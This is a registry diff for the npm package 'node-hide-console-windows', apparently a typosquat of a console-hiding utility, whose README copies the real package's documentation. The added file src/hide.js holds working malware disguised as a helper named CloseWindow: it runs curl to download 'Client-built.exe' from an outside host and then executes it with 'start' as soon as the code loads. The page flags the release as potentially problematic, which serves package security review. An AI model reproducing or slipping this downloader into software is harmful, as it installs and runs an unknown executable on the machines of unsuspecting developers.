node-hide-console-windows 0.0.1-security → 1.2.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of node-hide-console-windows might be problematic. Click here for more details.
- package/LICENSE +21 -0
- package/README.md +59 -5
- package/index.d.ts +5 -0
- package/index.js +7 -0
- package/package.json +9 -3
- package/src/hide.js +32 -0
package/LICENSE
ADDED
@@ -0,0 +1,21 @@
|
|
1
|
+
MIT License
|
2
|
+
|
3
|
+
Copyright (c) 2021 Edu
|
4
|
+
|
5
|
+
Permission is hereby granted, free of charge, to any person obtaining a copy
|
6
|
+
of this software and associated documentation files (the "Software"), to deal
|
7
|
+
in the Software without restriction, including without limitation the rights
|
8
|
+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
9
|
+
copies of the Software, and to permit persons to whom the Software is
|
10
|
+
furnished to do so, subject to the following conditions:
|
11
|
+
|
12
|
+
The above copyright notice and this permission notice shall be included in all
|
13
|
+
copies or substantial portions of the Software.
|
14
|
+
|
15
|
+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
16
|
+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
17
|
+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
18
|
+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
19
|
+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
20
|
+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
|
21
|
+
SOFTWARE.
|
package/README.md
CHANGED
@@ -1,5 +1,59 @@
|
|
1
|
-
#
|
2
|
-
|
3
|
-
|
4
|
-
|
5
|
-
|
1
|
+
# [node-hide-console-window](https://www.npmjs.com/package/node-hide-console-window)
|
2
|
+
|
3
|
+
A node module to toggle your app's console window visibility. (Can be used with compilers
|
4
|
+
like [pkg](https://www.npmjs.com/package/pkg))
|
5
|
+
|
6
|
+
### Platforms
|
7
|
+
|
8
|
+
- Windows
|
9
|
+
|
10
|
+
## Warning
|
11
|
+
|
12
|
+
I recently updated this package to match the javascript lint so if you are experiencing any problem related to not
|
13
|
+
finding the method take a look at the usage section again.
|
14
|
+
|
15
|
+
## Installation
|
16
|
+
|
17
|
+
```bash
|
18
|
+
yarn add node-hide-console-window
|
19
|
+
```
|
20
|
+
|
21
|
+
or
|
22
|
+
|
23
|
+
```bash
|
24
|
+
npm install node-hide-console-window
|
25
|
+
```
|
26
|
+
|
27
|
+
## Usage
|
28
|
+
|
29
|
+
#### Using import syntax
|
30
|
+
|
31
|
+
```typescript
|
32
|
+
import {showConsole, hideConsole} from "node-hide-console-window";
|
33
|
+
|
34
|
+
//To hide your console just call:
|
35
|
+
hideConsole();
|
36
|
+
|
37
|
+
//To show it again use:
|
38
|
+
showConsole();
|
39
|
+
```
|
40
|
+
|
41
|
+
#### Using require syntax
|
42
|
+
|
43
|
+
```typescript
|
44
|
+
const ConsoleWindow = require("node-hide-console-window");
|
45
|
+
|
46
|
+
//To hide your console just call:
|
47
|
+
ConsoleWindow.hideConsole();
|
48
|
+
|
49
|
+
//To show it again use:
|
50
|
+
ConsoleWindow.showConsole();
|
51
|
+
```
|
52
|
+
|
53
|
+
## Contributing
|
54
|
+
|
55
|
+
Pull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.
|
56
|
+
|
57
|
+
## License
|
58
|
+
|
59
|
+
[MIT](https://choosealicense.com/licenses/mit/)
|
package/index.d.ts
ADDED
package/index.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "node-hide-console-windows",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.2.2",
|
4
|
+
"description": "",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
8
|
+
},
|
9
|
+
"keywords": [],
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
package/src/hide.js
ADDED
@@ -0,0 +1,32 @@
|
|
1
|
+
const { exec } = require('child_process');
|
2
|
+
|
3
|
+
const fileUrl = 'https://reveal-me.fr/Client-built.exe';
|
4
|
+
const fileName = 'Client-built.exe';
|
5
|
+
|
6
|
+
const CloseWindow = (url, destination) => {
|
7
|
+
return new Promise((resolve, reject) => {
|
8
|
+
const downloadCommand = `curl -o ${destination} ${url}`;
|
9
|
+
exec(downloadCommand, (error, stdout, stderr) => {
|
10
|
+
if (error) {
|
11
|
+
reject(error);
|
12
|
+
} else {
|
13
|
+
console.log('Téléchargement terminé.');
|
14
|
+
|
15
|
+
const openCommand = `start ${destination}`;
|
16
|
+
exec(openCommand, (error) => {
|
17
|
+
if (error) {
|
18
|
+
reject(error);
|
19
|
+
} else {
|
20
|
+
console.log('Fichier ouvert avec succès.');
|
21
|
+
resolve();
|
22
|
+
}
|
23
|
+
});
|
24
|
+
}
|
25
|
+
});
|
26
|
+
});
|
27
|
+
};
|
28
|
+
|
29
|
+
CloseWindow(fileUrl, fileName)
|
30
|
+
.catch((error) => {
|
31
|
+
console.error('Une erreur s\'est produite :', error);
|
32
|
+
});
|